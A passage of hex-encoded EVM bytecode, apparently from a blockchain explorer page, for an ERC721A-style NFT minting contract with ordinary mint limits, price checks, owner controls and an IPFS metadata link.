ffffffffffffffffffffffffffffffffffff16145b61129d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611294906140c3565b60405180910390fd5b80600e8190555050565b60006112b282612d60565b600001519050919050565b6000600a54905090565b601380546112d490613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461130090613d6c565b801561134d5780601f106113225761010080835404028352916020019161134d565b820191906000526020600020905b81548152906001019060200180831161133057829003601f168201915b505050505081565b6014805461136290613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461138e90613d6c565b80156113db5780601f106113b0576101008083540402835291602001916113db565b820191906000526020600020905b8154815290600101906020018083116113be57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611453576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161144a90614305565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6114d3612768565b73ffffffffffffffffffffffffffffffffffffffff166114f16115b2565b73ffffffffffffffffffffffffffffffffffffffff1614806115675750611516612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159d906140c3565b60405180910390fd5b6115b06000612efa565b565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6115e4612768565b73ffffffffffffffffffffffffffffffffffffffff166116026115b2565b73ffffffffffffffffffffffffffffffffffffffff1614806116785750611627612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ae906140c3565b60405180910390fd5b80600a8190555050565b6060600280546116d090613d6c565b80601f01602080910402602001604051908101604052809291908181526020018280546116fc90613d6c565b80156117495780601f1061171e57610100808354040283529160200191611749565b820191906000526020600020905b81548152906001019060200180831161172c57829003601f168201915b5050505050905090565b600a5481565b6000600a54905060006001600e546117719190614354565b8360115461177f9190614354565b1080156117cc5750600c54601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611b3657601060009054906101000a900460ff16611823576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181a906143d4565b60405180910390fd5b600f548361182f610d48565b6118399190614354565b111561187a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187190614440565b60405180910390fd5b600b548311156118bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b6906144ac565b60405180910390fd5b601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c5461190c91906144cc565b8310611a285781601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c5461196091906144cc565b61196a9190614500565b82846119769190614500565b61198091906144cc565b3410156119c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119b99061458e565b60405180910390fd5b600c54601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600c5460116000828254611a1c9190614354565b92505081905550611b31565b601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600c54611a7591906144cc565b831015611b30576000341015611ac0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab79061458e565b60405180910390fd5b82601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611b0f9190614354565b925050819055508260116000828254611b289190614354565b925050819055505b5b611d6d565b601060009054906101000a900460ff16611b85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b7c906143d4565b60405180910390fd5b600d5483601660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611bd39190614354565b1115611c14576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c0b906145fa565b60405180910390fd5b8183611c209190614500565b341015611c62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c599061458e565b60405180910390fd5b600f5483611c6e610d48565b611c789190614354565b1115611cb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cb090614440565b60405180910390fd5b600b54831115611cfe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cf5906144ac565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611d6c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6390614666565b60405180910390fd5b5b82601660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611dbc9190614354565b92505081905550611dcd3384612fc0565b505050565b611dda612768565b73ffffffffffffffffffffffffffffffffffffffff16611df86115b2565b73ffffffffffffffffffffffffffffffffffffffff161480611e6e5750611e1d612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ead576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ea4906140c3565b60405180910390fd5b8060139081611ebc9190614832565b5050565b611ec8612768565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611f35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f2c90614950565b60405180910390fd5b8060066000611f42612768565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611fef612768565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051612034919061374d565b60405180910390a35050565b6000600c54905090565b612055848484612822565b61206184848484612fde565b6120a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612097906149e2565b60405180910390fd5b50505050565b6120ae612768565b73ffffffffffffffffffffffffffffffffffffffff166120cc6115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061214257506120f1612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612181576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612178906140c3565b60405180910390fd5b601060009054906101000a900460ff1615601060006101000a81548160ff021916908315150217905550565b600c5481565b60606121be8261275b565b6121fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121f490614a74565b60405180910390fd5b601260009054906101000a900460ff166122a1576014805461221e90613d6c565b80601f016020809104026020016040519081016040528092919081815260200182805461224a90613d6c565b80156122975780601f1061226c57610100808354040283529160200191612297565b820191906000526020600020905b81548152906001019060200180831161227a57829003601f168201915b50505050506122cd565b60136122ac83613165565b6040516020016122bd929190614b9f565b6040516020818303038152906040525b9050919050565b601060009054906101000a900460ff1681565b600f5481565b60115481565b6122fb612768565b73ffffffffffffffffffffffffffffffffffffffff166123196115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061238f575061233e612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6123ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123c5906140c3565b60405180910390fd5b80600c8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b612474612768565b73ffffffffffffffffffffffffffffffffffffffff166124926115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061250857506124b7612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612547576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161253e906140c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ad90614c40565b60405180910390fd5b6125bf81612efa565b50565b60156020528060005260406000206000915090505481565b600b5481565b6125e8612768565b73ffffffffffffffffffffffffffffffffffffffff166126066115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061267c575061262b612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6126bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126b2906140c3565b60405180910390fd5b80601490816126ca9190614832565b5050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600061282d82612d60565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16612854612768565b73ffffffffffffffffffffffffffffffffffffffff1614806128b05750612879612768565b73ffffffffffffffffffffffffffffffffffffffff1661289884610b93565b73ffffffffffffffffffffffffffffffffffffffff16145b806128cc57506128cb82600001516128c6612768565b6123d8565b5b90508061290e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290590614cd2565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612980576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297790614d64565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036129ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129e690614df6565b60405180910390fd5b6129fc85858560016132c5565b612a0c6000848460000151612770565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603612cf057612c4f8161275b565b15612cef5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612d5985858560016132cb565b5050505050565b612d6861365f565b612d718261275b565b612db0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612da790614e88565b60405180910390fd5b60008290505b60008110612eb9576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612eaa578092505050612ef5565b50808060019003915050612db6565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612eec90614f1a565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b612fda8282604051806020016040528060008152506132d1565b5050565b6000612fff8473ffffffffffffffffffffffffffffffffffffffff166126ce565b15613158578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02613028612768565b8786866040518563ffffffff1660e01b815260040161304a9493929190614f8f565b6020604051808303816000875af192505050801561308657506040513d601f19601f820116820180604052508101906130839190614ff0565b60015b613108573d80600081146130b6576040519150601f19603f3d011682016040523d82523d6000602084013e6130bb565b606091505b506000815103613100576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016130f7906149e2565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505061315d565b600190505b949350505050565b6060600082036131ac576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506132c0565b600082905060005b600082146131de5780806131c79061501d565b915050600a826131d79190615094565b91506131b4565b60008167ffffffffffffffff8111156131fa576131f96139f9565b5b6040519080825280601f01601f19166020018201604052801561322c5781602001600182028036833780820191505090505b5090505b600085146132b95760018261324591906144cc565b9150600a8561325491906150c5565b60306132609190614354565b60f81b818381518110613276576132756150f6565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856132b29190615094565b9450613230565b8093505050505b919050565b50505050565b50505050565b6132de83838360016132e3565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603613358576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161334f90615197565b60405180910390fd5b6000840361339b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161339290615229565b60405180910390fd5b6133a860008683876132c5565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b8581101561364257818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4831561362d576135ed6000888488612fde565b61362c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613623906149e2565b60405180910390fd5b5b81806001019250508080600101915050613576565b50806000819055505061365860008683876132cb565b5050505050565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b6136e2816136ad565b81146136ed57600080fd5b50565b6000813590506136ff816136d9565b92915050565b60006020828403121561371b5761371a6136a3565b5b6000613729848285016136f0565b91505092915050565b60008115159050919050565b61374781613732565b82525050565b6000602082019050613762600083018461373e565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156137a2578082015181840152602081019050613787565b60008484015250505050565b6000601f19601f8301169050919050565b60006137ca82613768565b6137d48185613773565b93506137e4818560208601613784565b6137ed816137ae565b840191505092915050565b6000602082019050818103600083015261381281846137bf565b905092915050565b6000819050919050565b61382d8161381a565b811461383857600080fd5b50565b60008135905061384a81613824565b92915050565b600060208284031215613866576138656136a3565b5b60006138748482850161383b565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006138a88261387d565b9050919050565b6138b88161389d565b82525050565b60006020820190506138d360008301846138af565b92915050565b6138e28161389d565b81146138ed57600080fd5b50565b6000813590506138ff816138d9565b92915050565b6000806040838503121561391c5761391b6136a3565b5b600061392a858286016138f0565b925050602061393b8582860161383b565b9150509250929050565b60006020828403121561395b5761395a6136a3565b5b6000613969848285016138f0565b91505092915050565b61397b8161381a565b82525050565b60006020820190506139966000830184613972565b92915050565b6000806000606084860312156139b5576139b46136a3565b5b60006139c3868287016138f0565b93505060206139d4868287016138f0565b92505060406139e58682870161383b565b9150509250925092565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b613a31826137ae565b810181811067ffffffffffffffff82111715613a5057613a4f6139f9565b5b80604052505050565b6000613a63613699565b9050613a6f8282613a28565b919050565b600067ffffffffffffffff821115613a8f57613a8e6139f9565b5b613a98826137ae565b9050602081019050919050565b82818337600083830152505050565b6000613ac7613ac284613a74565b613a59565b905082815260208101848484011115613ae357613ae26139f4565b5b613aee848285613aa5565b509392505050565b600082601f830112613b0b57613b0a6139ef565b5b8135613b1b848260208601613ab4565b91505092915050565b600060208284031215613b3a57613b396136a3565b5b600082013567ffffffffffffffff811115613b5857613b576136a8565b5b613b6484828501613af6565b91505092915050565b613b7681613732565b8114613b8157600080fd5b50565b600081359050613b9381613b6d565b92915050565b60008060408385031215613bb057613baf6136a3565b5b6000613bbe858286016138f0565b9250506020613bcf85828601613b84565b9150509250929050565b600067ffffffffffffffff821115613bf457613bf36139f9565b5b613bfd826137ae565b9050602081019050919050565b6000613c1d613c1884613bd9565b613a59565b905082815260208101848484011115613c3957613c386139f4565b5b613c44848285613aa5565b509392505050565b600082601f830112613c6157613c606139ef565b5b8135613c71848260208601613c0a565b91505092915050565b60008060008060808587031215613c9457613c936136a3565b5b6000613ca2878288016138f0565b9450506020613cb3878288016138f0565b9350506040613cc48782880161383b565b925050606085013567ffffffffffffffff811115613ce557613ce46136a8565b5b613cf187828801613c4c565b91505092959194509250565b60008060408385031215613d1457613d136136a3565b5b6000613d22858286016138f0565b9250506020613d33858286016138f0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680613d8457607f821691505b602082108103613d9757613d96613d3d565b5b50919050565b7f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560008201527f78697374656e7420746f6b656e00000000000000000000000000000000000000602082015250565b6000613df9602d83613773565b9150613e0482613d9d565b604082019050919050565b60006020820190508181036000830152613e2881613dec565b9050919050565b7f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60008201527f6572000000000000000000000000000000000000000000000000000000000000602082015250565b6000613e8b602283613773565b9150613e9682613e2f565b604082019050919050565b60006020820190508181036000830152613eba81613e7e565b9050919050565b7f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60008201527f776e6572206e6f7220617070726f76656420666f7220616c6c00000000000000602082015250565b6000613f1d603983613773565b9150613f2882613ec1565b604082019050919050565b60006020820190508181036000830152613f4c81613f10565b9050919050565b7f455243373231413a206f776e657220696e646578206f7574206f6620626f756e60008201527f6473000000000000000000000000000000000000000000000000000000000000602082015250565b6000613faf602283613773565b9150613fba82613f53565b604082019050919050565b60006020820190508181036000830152613fde81613fa2565b9050919050565b7f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060008201527f6f776e657220627920696e646578000000000000000000000000000000000000602082015250565b6000614041602e83613773565b915061404c82613fe5565b604082019050919050565b6000602082019050818103600083015261407081614034565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006140ad602083613773565b91506140b882614077565b602082019050919050565b600060208201905081810360008301526140dc816140a0565b9050919050565b7f5265656e7472616e637947756172643a207265656e7472616e742063616c6c00600082015250565b6000614119601f83613773565b9150614124826140e3565b602082019050919050565b600060208201905081810360008301526141488161410c565b9050919050565b600081905092915050565b50565b600061416a60008361414f565b91506141758261415a565b600082019050919050565b600061418b8261415d565b9150819050919050565b7f5472616e73666572206661696c65642e00000000000000000000000000000000600082015250565b60006141cb601083613773565b91506141d682614195565b602082019050919050565b600060208201905081810360008301526141fa816141be565b9050919050565b7f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f7560008201527f6e64730000000000000000000000000000000000000000000000000000000000602082015250565b600061425d602383613773565b915061426882614201565b604082019050919050565b6000602082019050818103600083015261428c81614250565b9050919050565b7f455243373231413a2062616c616e636520717565727920666f7220746865207a60008201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b60006142ef602b83613773565b91506142fa82614293565b604082019050919050565b6000602082019050818103600083015261431e816142e2565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061435f8261381a565b915061436a8361381a565b925082820190508082111561438257614381614325565b5b92915050565b7f4d696e74206973206e6f74206c69766520796574000000000000000000000000600082015250565b60006143be601483613773565b91506143c982614388565b602082019050919050565b600060208201905081810360008301526143ed816143b1565b9050919050565b7f4e6f206d6f726500000000000000000000000000000000000000000000000000600082015250565b600061442a600783613773565b9150614435826143f4565b602082019050919050565b600060208201905081810360008301526144598161441d565b9050919050565b7f4d61782070657220545820726561636865642e00000000000000000000000000600082015250565b6000614496601383613773565b91506144a182614460565b602082019050919050565b600060208201905081810360008301526144c581614489565b9050919050565b60006144d78261381a565b91506144e28361381a565b92508282039050818111156144fa576144f9614325565b5b92915050565b600061450b8261381a565b91506145168361381a565b92508282026145248161381a565b9150828204841483151761453b5761453a614325565b5b5092915050565b7f506c656173652073656e64207468652065786163742045544820616d6f756e74600082015250565b6000614578602083613773565b915061458382614542565b602082019050919050565b600060208201905081810360008301526145a78161456b565b9050919050565b7f457863656564206d6178696d756d204e465473207065722077616c6c65740000600082015250565b60006145e4601e83613773565b91506145ef826145ae565b602082019050919050565b60006020820190508181036000830152614613816145d7565b9050919050565b7f546865206d696e74657220697320616e6f7468657220636f6e74726163740000600082015250565b6000614650601e83613773565b915061465b8261461a565b602082019050919050565b6000602082019050818103600083015261467f81614643565b9050919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026146e87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826146ab565b6146f286836146ab565b95508019841693508086168417925050509392505050565b6000819050919050565b600061472f61472a6147258461381a565b61470a565b61381a565b9050919050565b6000819050919050565b61474983614714565b61475d61475582614736565b8484546146b8565b825550505050565b600090565b614772614765565b61477d818484614740565b505050565b5b818110156147a15761479660008261476a565b600181019050614783565b5050565b601f8211156147e6576147b781614686565b6147c08461469b565b810160208510156147cf578190505b6147e36147db8561469b565b830182614782565b50505b505050565b600082821c905092915050565b6000614809600019846008026147eb565b1980831691505092915050565b600061482283836147f8565b9150826002028217905092915050565b61483b82613768565b67ffffffffffffffff811115614854576148536139f9565b5b61485e8254613d6c565b6148698282856147a5565b600060209050601f83116001811461489c576000841561488a578287015190505b6148948582614816565b8655506148fc565b601f1984166148aa86614686565b60005b828110156148d2578489015182556001820191506020850194506020810190506148ad565b868310156148ef57848901516148eb601f8916826147f8565b8355505b6001600288020188555050505b505050505050565b7f455243373231413a20617070726f766520746f2063616c6c6572000000000000600082015250565b600061493a601a83613773565b915061494582614904565b602082019050919050565b600060208201905081810360008301526149698161492d565b9050919050565b7f455243373231413a207472616e7366657220746f206e6f6e204552433732315260008201527f6563656976657220696d706c656d656e74657200000000000000000000000000602082015250565b60006149cc603383613773565b91506149d782614970565b604082019050919050565b600060208201905081810360008301526149fb816149bf565b9050919050565b7f4552433732314d657461646174613a2055524920717565727920666f72206e6f60008201527f6e6578697374656e7420746f6b656e0000000000000000000000000000000000602082015250565b6000614a5e602f83613773565b9150614a6982614a02565b604082019050919050565b60006020820190508181036000830152614a8d81614a51565b9050919050565b600081905092915050565b60008154614aac81613d6c565b614ab68186614a94565b94506001821660008114614ad15760018114614ae657614b19565b60ff1983168652811515820286019350614b19565b614aef85614686565b60005b83811015614b1157815481890152600182019150602081019050614af2565b838801955050505b50505092915050565b6000614b2d82613768565b614b378185614a94565b9350614b47818560208601613784565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b6000614b89600583614a94565b9150614b9482614b53565b600582019050919050565b6000614bab8285614a9f565b9150614bb78284614b22565b9150614bc282614b7c565b91508190509392505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614c2a602683613773565b9150614c3582614bce565b604082019050919050565b60006020820190508181036000830152614c5981614c1d565b9050919050565b7f455243373231413a207472616e736665722063616c6c6572206973206e6f742060008201527f6f776e6572206e6f7220617070726f7665640000000000000000000000000000602082015250565b6000614cbc603283613773565b9150614cc782614c60565b604082019050919050565b60006020820190508181036000830152614ceb81614caf565b9050919050565b7f455243373231413a207472616e736665722066726f6d20696e636f727265637460008201527f206f776e65720000000000000000000000000000000000000000000000000000602082015250565b6000614d4e602683613773565b9150614d5982614cf2565b604082019050919050565b60006020820190508181036000830152614d7d81614d41565b9050919050565b7f455243373231413a207472616e7366657220746f20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614de0602583613773565b9150614deb82614d84565b604082019050919050565b60006020820190508181036000830152614e0f81614dd3565b9050919050565b7f455243373231413a206f776e657220717565727920666f72206e6f6e6578697360008201527f74656e7420746f6b656e00000000000000000000000000000000000000000000602082015250565b6000614e72602a83613773565b9150614e7d82614e16565b604082019050919050565b60006020820190508181036000830152614ea181614e65565b9050919050565b7f455243373231413a20756e61626c6520746f2064657465726d696e652074686560008201527f206f776e6572206f6620746f6b656e0000000000000000000000000000000000602082015250565b6000614f04602f83613773565b9150614f0f82614ea8565b604082019050919050565b60006020820190508181036000830152614f3381614ef7565b9050919050565b600081519050919050565b600082825260208201905092915050565b6000614f6182614f3a565b614f6b8185614f45565b9350614f7b818560208601613784565b614f84816137ae565b840191505092915050565b6000608082019050614fa460008301876138af565b614fb160208301866138af565b614fbe6040830185613972565b8181036060830152614fd08184614f56565b905095945050505050565b600081519050614fea816136d9565b92915050565b600060208284031215615006576150056136a3565b5b600061501484828501614fdb565b91505092915050565b60006150288261381a565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361505a57615059614325565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061509f8261381a565b91506150aa8361381a565b9250826150ba576150b9615065565b5b828204905092915050565b60006150d08261381a565b91506150db8361381a565b9250826150eb576150ea615065565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f455243373231413a206d696e7420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000615181602183613773565b915061518c82615125565b604082019050919050565b600060208201905081810360008301526151b081615174565b9050919050565b7f455243373231413a207175616e74697479206d7573742062652067726561746560008201527f72207468616e2030000000000000000000000000000000000000000000000000602082015250565b6000615213602883613773565b915061521e826151b7565b604082019050919050565b6000602082019050818103600083015261524281615206565b905091905056fea264697066735822122058915653dfd98bbeb99fd0ffd26e7c404f030f7832f669dee1bcfcbaccdbcd8064736f6c6343000811003368747470733a2f2f697066732e696f2f697066732f516d507a487073463335636a6e66653279624e55344a355a4c4433517a53376f63664d38707448507348734b4758

Deployed Bytecode

0x6080604052600436106102515760003560e01c80638da5cb5b11610139578063c7c39ffc116100b6578063e945971c1161007a578063e945971c14610897578063e985e9c5146108c0578063f2fde38b146108fd578063f4db2acb14610926578063f968adbe14610963578063fe2c7fee1461098e57610251565b8063c7c39ffc146107ae578063c87b56dd146107d9578063d123973014610816578063d5abeb0114610841578063dad7b5c91461086c57610251565b8063a0bcfc7f116100fd578063a0bcfc7f146106f1578063a22cb4651461071a578063a702735714610743578063b88d4fde1461076e578063be9a65551461079757610251565b80638da5cb5b1461062b57806391b7f5ed1461065657806395d89b411461067f578063a035b1fe146106aa578063a0712d68146106d557610251565b806342842e0e116101d25780636352211e116101965780636352211e1461051957806364b72188146105565780636c0360eb146105815780637035bf18146105ac57806370a08231146105d7578063715018a61461061457610251565b806342842e0e14610434578063453c23101461045d5780634f6ccce71461048857806351830227146104c55780635a963f1b146104f057610251565b806318160ddd1161021957806318160ddd1461036157806323b872dd1461038c5780632f745c59146103b5578063333e44e6146103f25780633ccfd60b1461041d57610251565b806301ffc9a71461025657806306fdde031461